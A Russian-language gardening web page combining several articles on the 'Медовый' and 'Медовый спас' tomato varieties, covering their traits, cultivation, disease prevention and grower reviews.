1 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Описание сорта томата медовый

Какую урожайность можно ожидать от томата «Медовый» в открытом грунте

Розовоплодные томаты пользуются неизменной популярностью: они сочные, с приятным сладковатым вкусом, аппетитно выглядят. Салаты из таких плодов получаются особенно вкусными. Розовые помидоры благоприятно влияют на гормональный фон, метаболизм и иммунитет человека.

Сортов с розовыми ягодами десятки, но любителям помидоров с необычным послевкусием наверняка понравится томат Медовый. Чем так привлекателен этот сорт и каковы нюансы его выращивания, читайте далее.

Общее описание сорта

Томат Медовый – это сорт, выведенный агрофирмой «Деметра» (Барнаул). В 2007 году сорт был внесен в российский реестр. Выпускают томат Медовый многие производители. Среди них «Седек», «Аэлита», «Поиск».

Помидоры Медовые считаются крупноплодными. В среднем ягоды на кусте достигают 500 г. У них насыщенный малиново-розовый цвет, форма таких помидоров круглая и приплюснутая. Вкус плодов насыщенный сладкий с медовым послевкусием, мякоть нежная и сочная.

Сорт относят к салатным. Он не подходит для консервации из-за крупных размеров и для заморозки из-за высокой сочности. Зато соусы и соки из таких ягод получаются особенно вкусными и ароматными.

Сорт устойчив к похолоданиям, не восприимчив к перепадам температур. Медовый обладает неплохой резистентностью к томатным заболеваниям. Однако нуждается в регулярной обработке средствами профилактики.

Основные характеристики

Томат Медовый отличатся не только приятным вкусом, но и высокой урожайностью. С его выращиванием справится даже начинающий садовод.

Характеристики и описание сорта помидоров Медовый приведены в таблице:

Параметр Показатели
Тип куста Индетерминантное растение. Главный стебель достигает в высоту 120-150 см. Кусты не раскидистые, среднеоблиственные. Листья простые, темно-зеленые, крупные. Соцветия простые. Первое образуется на уровне 6-8 листа. Следующие — через каждые 1-2 листа. Этот томат не относится к кистевым.
Способ выращивания В южных регионах томат сажают в открытый грунт. В центральных и северных регионах лучшие показатели наблюдаются при выращивании в теплице.
Урожайность Высокая. С 1 кв. м получают до 4 кг. плодов.
Плоды Крупные. Масса одной ягоды в среднем достигает 0,4-0,5 кг. Самый большой томат может достигать веса 1 кг. Ягоды имеют равномерный розово-малиновый окрас внутри и снаружи. Возле основания зеленого пятна нет. Форма томатов округлая, приплюснутая сверху и снизу. Есть небольшая ребристость. Вкус насыщенный томатный, сладкий, с медовым привкусом. Мякоть нежная и сочная. Содержание сахара в помидорах – 5%. Внутри каждой ягоды находится до шести камер со средним количеством семян.
Транспортабельность Высокая. Плотная, но негрубая кожица позволяет транспортировать помидоры на большие расстояния и хранить более трех недель.
Сроки созревания Среднеспелый сорт. Урожай собирают через 105-110 дней после посева семян. Плодоношение продолжается все лето.
Устойчивость к болезням Обладает средним иммунитетом к основным томатным заболеваниям.

Особенности выращивания в различных регионах

Томат Медовый подходит для выращивания во всех регионах России:

  • в южных и центральных регионах помидоры этого сорта выращивают как в открытом грунте, так и в теплицах. Нередко их сажают под пленочные укрытия;
  • в северных регионах Медовый сажают в защищенный грунт. В теплицах он показывает лучшую урожайность.

Другие сорта крупноплодных томатов:

Преимущества и недостатки томата Медовый

Достоинства сорта:

  • иммунитет к томатным заболеваниям;
  • высокая урожайность;
  • крупноплодность;
  • устойчивость к температурным колебаниям;
  • насыщенный сладко-медовый вкус плодов;
  • неприхотливость в уходе.

Из недостатков выделяют необходимость подвязки и формирования куста.

Агротехника томата

Вырастить помидоры сорта Медовый несложно. С этим справится даже начинающий садовод.

Как и другие среднеспелые томаты, в нашей стране Медовый выращивают рассадным способом. В этом случае плоды успевают вызреть до заморозков.

Выращивание рассады

Семена на рассаду высеивают в начале марта. В северных регионах рассаду начинают выращивать в конце марта.

Перед тем, как приступить к высеванию семян, их следует подготовить.

Выделяют 3 этапа обработки посадочного материала:

  1. Семена проверяют на всхожесть. Их замачивают на полчаса в растворе соли. Всплывшие экземпляры выбрасывают, а опустившиеся на дно собирают и используют для посадки.
  2. Семечки замачивают в растворе марганцовки, приготовленном из 1 г порошка и 100 мл воды. Через полчаса их промывают под проточной водой.
  3. Стимулируют прорастание посадочного материала. Семена замачивают в покупных («Эпин», «Гумат нария») или самодельных (медовая вода, сок алоэ) средствах.

Грунт для томатов покупают в магазинах или готовят самостоятельно. В первом случае покупают универсальные смеси для перца, томатов и кабачков. Во втором смешивают такие ингредиенты:
  • торф, перегной и чернозем в равных пропорциях;
  • песок и торф в равных пропорциях;
  • чернозем и кокосовый субстрат в равных пропорциях.

Грунт прокаливают в духовке, поливают кипятком или раствором марганцовки. Эти меры уничтожат болезнетворных микробов.

Емкости для посева семян тоже дезинфицируют: на полчаса замачивают в растворе марганцовки. В ящики для рассады насыпают грунт так, чтобы до края оставались 1-2 см. На почву рядами укладывают семена, оставляя расстояние между ними в 2-3 см. Посадочный материал присыпают сантиметровым слоем почвы.

Грунт увлажняют из пульверизатора теплой водой. Ящики накрывают пленкой и ставят в теплое место. Когда появятся первые всходы, пленку снимают. Ящики ставят на подоконник.

Совет. Весной рассаде часто не хватает солнечного света. Чтобы решить эту проблему, используют люминесцентную лампу.

Поливают рассаду по мере высыхания почвы. Делают это аккуратно, чтобы жидкость не попала на наземную часть растений. Для полива используют только теплую отстоявшуюся воду.

Пикируют томаты после того, как у них появятся первые настоящие листочки. Их аккуратно извлекают из ящика и рассаживают по индивидуальным горшочкам. На дно емкостей насыпают слой дренажа.

Через две недели после пикировки рассаду первый раз поливают и подкармливают. В качестве подкормки используют биогумус или составы, предназначенные для томатной рассады. Еще через две недели удобрение вносят повторно.

За 14 дней до высадки рассады на постоянное место ее начинают закалять. Первый раз растения выносят на балкон или на улицу на 30 минут. Затем на 1 час. Так время пребывания томатов на свежем воздухе постепенно увеличивают до 16 часов.

За 3-5 дней до пикировки помидоров в открытый грунт их поливают и подкармливают. Используют удобрения, в составе которых есть фосфор.

Посадка в открытый грунт

В открытый грунт помидоры высаживают во второй половине мая. В южных регионах высадка возможна и в конце апреля. Главное, чтобы к этому времени температура почвы на глубине 15 см не была ниже 14 °C.

Грядки для томатов следует выбирать правильно, а именно:

  1. На одной грядке не должны расти более трех лет помидоры. Не сажают томаты и на участок, где до этого росли другие пасленовые культуры. На такие грядки помидоры высаживают не раньше, чем через 3 года.
  2. Помидоры – светолюбивая культура. От количества солнца напрямую зависит их вкус. Для этой культуры выбирают хорошо освещенный участок огорода.
  3. Возле помидоров не сажают картофель. Он привлекает к растениям вредителей.

Грунт для томатов подготавливают заранее. Для этого его перекапывают и очищают от растительных остатков. Осенью на 1 кв. м вносят 5 кг навоза. Если кислотность почвы повышена, ее понижают, добавляя золу. Весной землю очищают от сорняков и разравнивают граблями, поливают медным купоросом.

Лунки выкапывают рядами в шахматном порядке. На 1 кв. м размещают 3-4 растения. На дно лунки засыпают 1 ст. л золы или гранулированных удобрений длительного действия. В каждое углубление помещают по одному растению. Лунки засыпают почвой, которую уплотняют. Растения поливают, расходуя на каждое растение по 1 л теплой отстоявшейся воды.

Уход за взрослыми растениями

При посадке томатов в открытый грунт первые две недели на ночь грядки накрывают пленкой, чтобы растения не погибли от заморозков.

Помидоры Медовые подвязывают. По мере роста кусты прикрепляют к деревянной опоре синтетической нитью.

Формируют помидоры в 1-3 стебля. Чем больше стеблей останется, тем обильнее будет урожай, но тем мельче будут томаты.

Это интересно. Отзывы говорят о том, что первые томаты — самые большие.

При пасынковании томатов удаляют лишние листья. Убирают зелень до первой кисти. Процедуру проводят 1 раз в неделю рано утром или на заходе солнца. За один сеанс срывают не более трех листков.

Поливают помидоры по мере высыхания почвы. На одно растение используют 2 л воды. В теплице землю увлажняют 1 раз в неделю, а в открытом грунте — 2-3 раза. После каждого полива и дождя почву рыхлят. Такая процедура позволяет разрушить земляную корку и восстановить воздухообмен в корнях. Опытные садоводы мульчируют грядки. В качестве мульчи, которая защитит корни от вредителей и неблагоприятных условий окружающей среды, используют солому, сену или перегной.

При выращивании томатов в теплице ежедневно проветривайте помещение для поддержания оптимальной влажности.

Обратите внимание! Во время цветения томатные кусты регулярно встряхивают — это помогает опылению.

Помидоры следует регулярно подкармливать. За сезон вносят 3-4 подкормки. Используют комплексные минеральные или органические удобрения. В грунт вносят аммиачную селитру, коровяк, «Суперфосфат», куриный помет и т.д.

Растения также опрыскивают внекорневыми подкормками. Используют средства, в состав которых входит бор.

Профилактика болезней и вредителей

Томат Медовый обладает высоким иммунитетом ко многим томатным болезням. Но случаи заражения помидоров этого сорта все же есть.

Чтобы получить хороший урожай, важно соблюдать правила профилактики:

  1. Весь инструмент, который будет взаимодействовать с томатными грядками, дезинфицируют. Обрабатывать следует посадочный материал, почву и емкости.
  2. На томатных грядках не должно оставаться сорных и культурных растений — на них могут быть споры грибков и вирусы.
  3. Поддерживают оптимальную влажность на томатных грядках и в теплицах. И повышенные, и пониженные показатели — идеальные условия для развития инфекций.
  4. Пасынкуйте растения, строго соблюдая правила этой процедуры. Неправильно обломанные пасынки увеличивают вероятность заражения растений.
  5. Медовый опрыскивают раствором марганцовки. Это предотвратит поражение растений грибком.
  6. Насекомые переносят возбудителей заболеваний и повреждают растения. Для защиты от них томаты опрыскивают отваром полыни или одуванчика (на одну часть травы берут 3 части кипятка, смесь используют после остывания). От тли поможет избавиться раствор, приготовленный из куска хозяйственного мыла и растворенного в ведре воды. Применяют для обработки помидоров и химические средства, например, «Актофит», «Актоцид», «Наповал».
  7. В пасмурные дни рекомендуется собирать не только спелые, но и крупные зеленые плоды. Это снизит вероятность заражения растений фитофторозом.
  8. Регулярно томатные грядки осматривают. Больные растения удаляют, насекомых собирают вручную.

Отзывы огородников

Отзывы о томате Медовый в основном положительные. Это вкусный и ароматный томат, который несложно выращивать.

Оксана, г. Никополь: «Выращиваю томат Медовый третий год. Сажаю в открытый грунт в конце апреля. Формирую в 2 стебля. Урожайность у этого томата отличная. С 1 кв. м собираю минимум 2 ведра плодов. На вкус помидорки сладкие и сочные. Медовый привкус действительно есть. Плоды крупные и красивые, как на фото».

Елена, г. Сочи: «Томат Медовый – мой любимый розовоплодный сорт. Очень урожайный и очень вкусный. Дает большие ягоды с медовым ароматом. Идеален для приготовления салатов. Помидоры формирую в 1 стебель. Так плоды получаются более крупные. Самый большой томат этого сорта, который я вырастила, весил 780 г. Семена из созревших на кусте плодов использую для посадки. Просто собираю их в конце лета, очищаю от мякоти и просушиваю».

Заключение

Томат Медовый понравится любителям розовоплодных томатов. На нем созревают красивые и крупные розовые ягоды. У них сладкий вкус с необычным медовым ароматом. Сорт идеален для салатов.

Вырастить такие помидоры просто. Они славятся устойчивостью к перепадам температур и стойким иммунитетом к основным болезням пасленовых. Начинающие садоводы справятся с сортом без особых трудностей.

Медовый спас – характеристика и описание сорта томата, отзывы, фото

С каждым годом селекционеры удивляют огородников и любителей новыми сортами вкусных томатов. Полки специализированных магазинов изобилуют предложениями, в огромном ассортименте тяжело ориентироваться. Чтобы помочь в выборе, мы предлагаем ознакомиться с замечательным сортом томата – Медовый спас, фото и отзывами о нем.

Происхождение сорта

Томат «Медовый спас» – действительно, относительно новый, молодой сорт. Ученые-селекционеры Новосибирска зарегистрировали свою новинку в 2004 году. За столь короткий срок сорт успел получить признание сибирских огородников. А все потому, что новосибирские селекционеры знают, каким требованиям должны отвечать томаты, выращиваемые в Сибири. Подробная характеристика и описание сорта представлены ниже.

Описание растения

Растение высокое, достигает 180 см и выше, но чаще вырастает до 150 см. Поэтому огородники прищипывают верхушку, ограничивая высоту. Из-за огромного роста куст томата не может самостоятельно держать ветки, поэтому побеги нужно подвязывать. Подвязку делают сразу во время посадки томата на постоянное место. Сорт среднеспелый.

Листья тонкие, светло-зеленого цвета, на стволе расположены не слишком часто.

Не смотря на мощный куст, томат рекомендуется вести в 2 ствола, в крайнем случае можно оставить 3 ствола.

Корневая система мощная, хорошо развиты корни, располагающиеся близко к поверхности земли, и уходящие в глубь грунта.

Этот сорт желательно выращивать в теплицах. Огородники отмечают, что сорт не любит жару.

Внимание! Для достижения высокой урожайности, чтобы кисти постоянно образовывали новые плоды, необходимо сажать не больше 3 растений на 1 кв.метр.

Характеристика плодов

На фото видно какие томаты у этого сорта красивые. Ярко-желтые, даже оранжево-медового цвета, они являются настоящим украшением теплицы.

В среднем, вес каждого помидора достигает 200 граммов, при правильном уходе куст может радовать «богатырями» по 500-600 граммов.

Описать форму плодов затруднительно. На одной ветке вызревают круглые и приплюснутые томаты, экземпляры в форме капли, купола.

В разрезе плоды очень мясистые, имеют мало семян, немного жидкости.

Особенно приятны томаты на вкус, отличаются повышенным содержанием сахара, а кислотности, напротив, даже не хватает. Из-за низкой кислотности томаты этого сорта не советуют консервировать.

Урожайность

Поскольку куст очень мощный, крепкий, у него хватает сил и питательных веществ давать достаточно много плодов. При правильном уходе с одного растения можно собрать более 6 кг помидор. Над 6-7 листом образуются первые кисти, на которых вызревают до 5 плодов.

Плюсы и минусы сорта

«Медовый спас», как и любой сорт имеет преимущества и недостатки.

  • сорт выведен новосибирцами, районирован, но пользуется спросом он не только у сибиряков, но и у огородников других регионов, ведь некапризные, устойчивые, выносливые сорта всегда желанные гости на грядках огородников;
  • высокий урожай;
  • в регионах с теплым климатом сорт великолепно выращивается в открытом грунте;
  • великолепные вкусовые качества;
  • не гибрид, значит, купив семена однажды, можно в дальнейшем собирать семена с томатов самостоятельно;
  • томаты придают салатам хороший вкус и декоративность;
  • недозрелые томаты прекрасно дозревают в комнатных условиях, в это время на кустах, с которых собрали неспелый урожай, могут образовываться новые плоды – так обеспечивается очень длительное плодоношение;
  • томаты отлично хранятся;
  • транспортабельность хорошая, чтобы сохранить прекрасный внешний товарный вид, лучше для перевозок снимать недозрелые помидоры;
  • гипоаллергенны, показаны к употреблению в детских учреждениях;
  • устойчив к большинству болезней и вредителей.

  • некоторым огородникам не нравится, что из-за величины и сладости плодов их нельзя консервировать;
  • мякоть мясистая – трудно собирать семена;
  • урожайность средняя;
  • иногда, при температуре выше 35 градусов и ниже +15 плохо образуются завязи – это тоже относится к минусам (хотя, при такой погоде завязи плохо образуются у большинства сортов).

Посадка рассады томатов

Чтобы вырастить сорт « Медовый спас», сначала нужно посадить рассаду.

Сажать семена нужно за 50-60 дней до того, как молодые растения пойдут на постоянное место роста (в теплицу или открытый грунт). Если в регионе выращивания погода позволяет высадить растения в теплицу 1 мая, сажать рассаду можно в начале марта.

  1. Почву насыпают в ящички, проливают ее горячей водой с марганцовкой.
  2. Через 2 дня можно высаживать семена.
  3. Ящички с рассадой нужно выставить на солнечное место, через неделю появятся первые всходы.
  4. Молоденькие растения нужно поливать, осторожно рыхлить палочкой и переворачивать разными сторонами к солнцу, чтобы всем кустикам хватало солнечных лучей.
  5. Когда на растениях появились 4-5 листиков, их нужно распикировать – рассадить каждое растеньице в отдельный горшок (стаканчик).
  6. Перед посадкой в теплицу томаты закаляют – в теплую погоду их выносят в теплицу или ставят на открытое окно, оставляют там в первые дни на 30-40 минут, в последующие прибавляют время закалки.
  7. Когда грунт в теплицах и огороде прогреется, погода установится теплая и заморозки не будут угрожать, рассаду можно высадить на постоянное место.

Уход за томатом

Никакого изысканного ухода за кустами этот сорт не требует. Ему, как и всем помидорам, требуются полив, подвязка, рыхление, прополка, подкормка и защита от вредителей.

  • Подвязка. Подвязывают томаты сразу после посадки из рассадочных стаканчиков в теплицу или грунт.
  • Полив. Орошение лучше проводить в утренние часы, раз в неделю. Если температура воздуха очень высокая (середина лета), может потребоваться более частый полив. При холодной, сырой погоде поливать нужно реже.
  • После полива, когда влага немного уйдет в почву и испарится, нужно хорошо порыхлить землю под кустиками. Рыхлить следует аккуратно, стараясь не повредить корешки. В процессе рыхления нужно сразу убирать сорняки.
  • Пасынкование – это вырезание дополнительных ростков, появляющихся в пазухах листьев. Пасынки нужно вырезать часто – они быстро растут.
  • Через 10 дней после посадки рассады томатов, растения можно подкормить органикой. Через 2 недели подкормку следует повторить.

Вредители и болезни

Болезни лучше предотвратить, нежели лечить. Поэтому нужно создать определенные условия, чтобы растения не болели (тем более, что сорт очень устойчив к заболеваниям):

  1. нужно следить за поливом – избегать лишней сырости, застаивания влаги;
  2. важно своевременно пасынковать томаты – чтобы не было затененности, ветки хорошо проветривались;
  3. регулярно убирать сухие листья.

Если появились первые признаки заболеваний или на листьях томата стали заметны следы вредителей, нужно сразу обработать все растения (даже здоровые) соответствующим препаратом. Препараты можно подобрать в любом садоводческом магазине.

Отзывы

Интересно почитать отзывы тех, кто уже сажал этот сорт. Вот некоторые впечатления:

Несколько лет сажаю эти томаты в теплицу, очень нравятся, прямо сладкие, реально медовые, сочные! В разрезе необычные, напоминают диковинный фрукт. Кусты очень высокие, требуют частой подвязки. Урожайность невысокая, но вкусовые характеристики покрывают все недостатки!

Хочется посадить интересные сорта. Посадил «Медовый спас». В теплице теперь весело – сразу видно, какие помидоры поспели, какие не дозрели. Вкус томатов хорош. Говорят, что их не консервируют. Моя жена делает из помидоров прекрасный томатный сок – хранится хорошо, на вкус приятный.

Помидоры Медовый спас мощные, сильные, будете сажать – сразу подвязывайте. У меня в теплице 5 кустов – семью салатами кормят все лето.

Это мой любимец – урожайный, вкуснейший, сладость медовая. Формирую в 3 ствола,семена собираю. Лежит хорошо, улеживается.

Понравились помидорчики на вкус, но, к сожалению, мои томаты заболели кладоспоризом.

Сорт нарядный, надежный, урожайный. Куст мощный, листья крупные, мякоть плотная, медовая. Рекомендую.

Высаживаю сот уже 3 года, очень нравится, отменный вкус, сок вкуснейший! Семена собираю каждый год сама, рассада удачная. Урожайность повысилась на второй год выращивания.

Томат медовый: описание сорта и характеристика плодов

Этот высокоурожайный сорт, дающий крупные и сочные плоды, обладает всеми необходимыми качествами для успешного выращивания в любых регионах России. На первом месте стоит неприхотливость растения: оно устойчиво к низкой температуре. Вырастить томат Медовый под силу даже начинающему огороднику или фермеру. Чтобы получить хороший урожай, воспользуйтесь рекомендациями опытных дачников.

Описание сорта

Томат выведен в Сибири, отличается особой стойкостью к низкой температуре. Внешне это крупноплодный сорт, не относящийся к детерминантным растениям. Когда образуется завязь плода, рост томата не прекращается, и формировать куст придется самостоятельно. Выращивать такие помидоры можно в тепличных укрытиях, парнике либо открытом грунте. Сортовая зрелость достигается за 105-110 дней. Высота растения 1,2 м (среднерослое). Крупные листья имеют темно-зеленый оттенок, соцветие простое. Томаты могут дозревать, если их собрать раньше времени.

Характеристика плодов

Масса зрелых плодов достигает 500 г, средний вес – 350-400 г. Цвет – ярко-розовый, розовый, оранжевый. Томаты Медовый имеют округлую, приплюснутую форму. Плотная и полезная мякоть (количество сухого вещества не более 6%) насчитывает 5-6 семенных камер. Семян мало. Отличительная особенность плодов – сладкий вкус. Благодаря плотной кожице томаты хорошо переносят транспортировку и хранение. На поверхности плодов просматриваются ребра.

Урожайность томатов

При правильном уход с куста получают до 4-х кг помидоров. Самые крупные – плоды первой кисти. Рекомендуемая схема посадки – 3-4 куста на м2 (на каждом образуется до 10 завязей). Урожайность – 16 кг с 1 квадратного метра, что является хорошим показателем среди томатов. В северных широтах наибольшее количество плодов получают, используя теплицу. На юге высокая урожайность достигается в открытом грунте.

Период созревания

Чтобы попробовать среднеспелые плоды, необходимо выждать 105-110 дней в жарком или умеренном климате и 115 – в холодном. Медовый относится к группе среднеранних сортов. В течение периода созревания необходимо обеспечить кустам хорошее солнечное освещение: чем интенсивнее оно будет, тем слаще получатся помидоры. Важно заранее выбрать на участке подходящее место.

Особенности выращивания

Сорт томата Медовый не требует особых условий для получения стабильных и высоких урожаев, и считается непритязательным. Выбирая место посадки в грунте, предпочтение отдавайте территории, хорошо освещаемой солнцем. На заключительной стадии созревания образуются тяжелые плоды, поэтому заранее приготовьте подвязки, опоры. Медовый дает положительные урожаи по всей территории РФ, в том числе в северных районах.

Преимущества сорта Медовый

Сравнивая томаты этого сорта с другими, можно выделить очевидные преимущества. Основными достоинствами растения являются:

  • солидные размеры и масса до 0,5 кг;
  • равномерная окраска;
  • круглая форма (чуть приплюснутая);
  • уплотненная мякоть;
  • малое количество семян;
  • сладкий вкус;
  • растение неприхотливо в уходе;
  • хорошая переносимость транспортировки;
  • длительное хранение свежих плодов;
  • дозревание урожая после сбора помидоров.

Такие преимущества обусловили широкую популярность сорта. Помидоры Медовые хорошо подходят для приготовления лечо, томатного соуса, но из-за солидных размеров не годятся для консервирования. Другая сфера применения – приготовление сока (в плодах равномерно распределены кислоты и пищевой сахар). Получаемый продукт благотворно влияет на здоровье человека.

Выращивание рассады

Семена необходимо посеять за 60-65 суток до высадки в открытый грунт (зимой). Сроки посадки у каждого региона страны свои. Для средних широт – начало либо середина марта. До посева семена (неважно, собранные или магазинные) обработайте стимулятором роста и протравливателем. Если нужных составов нет, воспользуйтесь соком алоэ. Растение уничтожит возбудителей болезней и стимулирует рост. Время замачивания семян – 18 часов. Если они лежалые, применяйте чистый сок алоэ, если свежие – разбавляйте его пополам с водой. Для промывания используйте раствор борной кислоты, марганца.

Иногда семена уже подготовлены компанией-продавцом: тогда их обрабатывать не нужно. Если вы не уверены, что семена взойдут после замачивания, прорастите их. Для этого потребуются влажные диски, которые нужно поместить в пакет из полиэтилена (температура +25 градусов) до наклевывания. «Чехол» снимайте пару раз в день, иначе семена задохнутся. Лучше приобрести готовый покупной грунт.

Посев семян

Для выращивания рассады понадобится деревянный или пластиковый ящик. Можете использовать отдельные горшки: заложите туда пару семечек и после их прорастания выберите сильный стебель. Какой бы способ вы ни выбрали, действуйте в такой последовательности:

  1. Почвенную смесь прогрейте и продезинфицируйте марганцовкой (за пару дней до посадки).
  2. Материал высаживайте на расстоянии пары сантиметров друг от друга (глубина – 1 см). Ближе сеять семена не рекомендуют из-за риска повреждения корня в процессе пикировки.
  3. Когда ростки поднимутся, выставьте рассаду на подоконник, где температура ниже. Это задержит вытягивание стеблей и стимулирует развитие корешков.
  4. Через пять-шесть дней желательно обеспечить температуру воздуха в 22 градуса днем и 18 – ночью.

Пикировка и полив рассады

При увлажнении грунта используйте теплую воду. Дожидаться просушивания верхнего слоя не стоит, но и заливать не нужно. Для пикировки рассады (сделайте это через 7 дней после появления пары листочков) возьмите отдельные стаканчики и поместите туда сильные побеги. На 3-4 дня поставьте их в тень. Ростки можно оставить и в ящике, но тогда обеспечьте расстояние между семенами в 8 см. Подкормка растений осуществляется через две и три недели.

Уход за помидорами в открытом грунте

Если выращиваете помидоры в теплице, ее необходимо проветривать, чтобы температура внутри конструкции не достигала 35 градусов, иначе завязь плодов будет невозможна. Для сбора хорошего урожая, при созревании томатов Медовый убирайте пасынки: на кусте должно быть не более двух крепких стеблей. Некоторые садоводы регулярно встряхивают кусты с соцветиями, осуществляя искусственное опыление. После высадки установите колышки для подвязывания помидоров, иначе крупные и тяжелые плоды сломают куст.

Когда томат Медовый можно пересаживать в открытый грунт

Пересаживать растение нужно, когда воздух ночью прогревается до 15 градусов. Сначала убедитесь, что томаты хорошо укоренились: это определяется по тургору листьев. Они будут упругими, цвет станет соответствовать сорту и приобретет малахитовый оттенок. На квадратном метре рекомендуется садить не более четырех кустов. Томат Медовый лучше выращивать на паре стеблей.

Подготовка почвы для высадки

Процедура подготовки почвы предусматривает перемешивание грунта с компостом, перегноем либо удобрениями. Не забывайте о древесной золе: это обязательный элемент, содержащий множество минеральных веществ, стимулирующих успешный рост помидоров. Из удобрений рекомендуется использовать фосфорные и калийные составы: с ними связан характерный вкус помидоров. С осторожностью относитесь к азотным удобрениям: они увеличивают зеленую массу, что не всегда целесообразно. Из органики подойдет куриный помет (настой), коровяк.

Высадка кустов

Соблюдайте правила чередования культур. Лучшие предшественники для сорта помидоров Медовый – чеснок, лук, морковь или бобовые. Когда растения окажутся в почве, срежьте нижние листья и те, которые формируются над кистью. Это делается для улучшения прохождения воздушных потоков и повышения освещенности. Нужно удалять пасынки и сформировать куст с двумя стеблями. Поливайте высаженную рассаду пару раз за неделю. Одновременно подкармливайте растения и не забывайте их подвязывать.

Полив и подкормка томатов

Потребность помидоров во влаге неразрывно связана с этапами развития растений. После высадки рассады ее нужно обильно поливать: в одну лунку – до 5 л воды. После этого растения оставляют на неделю для укрепления. Дополнительного полива не требуется. Активный рост томатов начинается через 7 суток после высадки. Корневая система еще недостаточно сильна, чтобы самостоятельно вытягивать влагу из грунта. Поливайте кусты пару раз в 7 дней. На каждый используйте по 3 л воды.

Когда помидоры Медовый зацветут, на куст расходуйте 5 л воды, частоту полива уменьшите до 1 раза в 7 дней. При появлении плодов поливайте растения пару раз за неделю. Следите, чтобы почва не переувлажнялась. Когда помидоры покраснеют, поливы прекратите. Постепенное созревание плодов требует использования воды раз в неделю, иначе придется собирать треснутые томаты. Лучшее время для полива – послеобеденное.

У любителей выращивания огородных культур на грядках есть разные точки зрения по поводу частоты подкормки. Некоторые делают это 4 раза:

  • через пару недель после высадки в открытый грунт;
  • до цветения;
  • после формирования завязей;
  • при созревании плодов.

Созревание плодов не происходит равномерно, поэтому часть селекционеров осуществляет чередование подкормки каждые 7 дней. Один из эффективных способов получения хорошего урожая – внекорневая подкормка. В этом случае питательные вещества проникают в ткани растения. Для приготовления раствора в количестве 10 л, потребуется:

  • по 1 г марганцовокислого калия и борной кислоты;
  • по 2 г сернокислых цинка и магния;
  • 0,5 г сернокислой меди.

При отсутствии желания составлять смеси самостоятельно, купите готовое комплексное удобрение. Опрыскивание проводите в пасмурную погоду или вечером. В противном случае вы рискуете обжечь листья. Когда томат Медовый массово зацветет, опрыскайте кусты кальциевой селитрой. Для приготовления раствора возьмите 1 столовую ложку химиката и растворите в ведре воды. Не допускайте перемешивания кальция и фосфора: перерыв между использованием удобрений должен быть четверо суток. Если томатам не хватает кальция, подскажут листья: они свернутся, а на помидорах образуется гниль.

Профилактика болезней и вредителей

Все помидоры обладают антибактериальным действием. Листья томатов активно применяют для борьбы с огородными и садовыми вредителями. Сами растения, находящиеся в стадии развития, плохо противостоят болезням. Проведение профилактических мероприятий, выявление заболеваний – залог высокого урожая. Чаще других встречаются такие болезни томатов:

  1. Фитофтороз. Грибки, вызывающие эту болезнь, «обожают» грунт, чрезмерно обработанный известью. Этому способствует боязнь огородников «закислить» почву. Риск появления фитофторы возрастает при резких перепадах температуры, когда выпадает роса, являющаяся источником избыточной влаги. К фитофторозу приводит дефицит микроэлементов: меди, калия, йода. В качестве профилактических мер опрыскивайте растения настоем чеснока либо молочной сывороткой. После уборки урожая перекопайте почву и удалите сорняки.
  2. Вершинная гниль. Первый признак ее появления – образование на вершине плода бурого пятна, разрастающегося со временем. При дождливой погоде грибковая болезнь испортит весь урожай, выбирая крупные плоды. В качестве профилактики применяйте фосфорно-калийные подкормки, добавляемые вначале периода вегетации. До посадки обработайте семена фитоспорином. Опрыскивание грунтовых кустов проводите бордосской смесью или 0,3% раствором хлора и кальция.
  3. Пятнистость листьев. Грибок делает их бурыми. Заболевание появляется во время цветения и при созревании помидоров. Листья начинают «ржаветь» снизу, грибок поднимается по стеблю, заражая и его. Болезнь активно распространяется при дожде, сильном ветре и в ходе полива. Чтобы предотвратить распространение грибка, после снятия урожая сожгите ботву. Если заболевание обнаружилось, обработайте листья раствором, состоящим из мыла и медного купороса.
  4. Фузариоз. Болезнь встречается у растений, выращиваемых в теплице (пленка тоже способствует развитию грибка). К симптомам относится пожелтение листьев, куста. Помидоры гибнут незрелыми. Возбудитель начинает активно действовать при недостатке влаги, плохом освещении и высокой температуре. Чтобы побороть грибок, перед посадкой перекопайте почву, а после снятия урожая продезинфицируйте ее. Если болезнь массовая, применяйте Фундазол.
  5. Мозаика. Заболевание характерно для растений, выращиваемых под тепличным укрытием и находящихся в открытом грунте. Грибок поражает листья, которые в результате желтеют и сворачиваются. То же происходит со стеблем, плодоножкой. В итоге куст погибает. В качестве профилактической меры используйте пасынкование (ликвидация пазушных побегов). Хороший результат дает обработка растения раствором марганцовки (несколько капель вещества на ведро воды) на этапе рассады.

Сорт томата Медовый – фото

Видео

Отзывы

Анна, 37 лет Я выращивала помидоры сорта Медовый в теплице. Растение порадовало высокой урожайностью и отменным вкусом: плоды сладкие, напоминают мед и оправдывают свое название. Употребление их в пищу в виде салатов – одно удовольствие. У томата крупные плоды – у меня был красивый образец массой больше 500 г – настоящий гигант! Всем советую сорт, это мой любимец.

Елена, 55 лет О томате Медовый я слышала давно, решила высадить в теплицу. Получились крупные, округлые плоды. Помидоры вкусные, сладкие, мякоть мясистая, аромат – незабываемый! Размеры плодов большие, но они не трескаются и сохраняют товарный вид – идеальный вариант для торговли.

Юлия, 22 года Обожаю салаты с помидорами и базиликом. На первом месте у меня томат Медовый – настоящий король среди пасленовых. Одного крупного плода, чтобы приготовить кушанье, хватит на всю семью. На следующий год обязательно буду выращивать этот сорт.

Томат Медовый: сорт, оправдывающий название

Говоря о чудесном вкусе различных овощей и фруктов, часто говорят, что он «медовый». Это прилагательное присутствует в названиях более чем десятка сортов помидоров, а один из них вот так просто и называется: Медовый. И надо сказать, вполне оправдывает своё имя.

Описание сорта Медовый, его характеристики, регион выращивания

Томат Медовый создан в барнаульской агрофирме «Деметра-Сибирь» и, естественно, в первую очередь предназначен для выращивания в непростых сибирских условиях. Но Госреестром РФ, куда сорт включён в 2007 году, он допущен к культивированию во всех климатических регионах. Сорт можно выращивать как в открытом грунте, так и в плёночных теплицах: в наиболее суровых местностях только в теплицах и сажают помидоры. Семена томата Медовый реализуют различные фирмы: Аэлита, Поиск, Седек и др.

Инфографика: краткое описание сорта томата Медовый по сведениям Госреестра

Краткое описание сорта томата Медовый по сведениям Госреестра

Сорт относится к числу индетерминантных, но до двухметровых размеров не дорастает. Как правило, к тому моменту, когда приходит пора прищипывать верхушки стеблей, его рост составляет 1,2–1,4 метра. Требует обязательного формирования куста и подвязывания побегов, а часто и плодовых кистей. Листья тёмно-зелёной окраски, крупные. По срокам созревания сорт считается среднеспелым: от момента появления всходов до сбора первых плодов проходит чуть меньше четырёх месяцев.

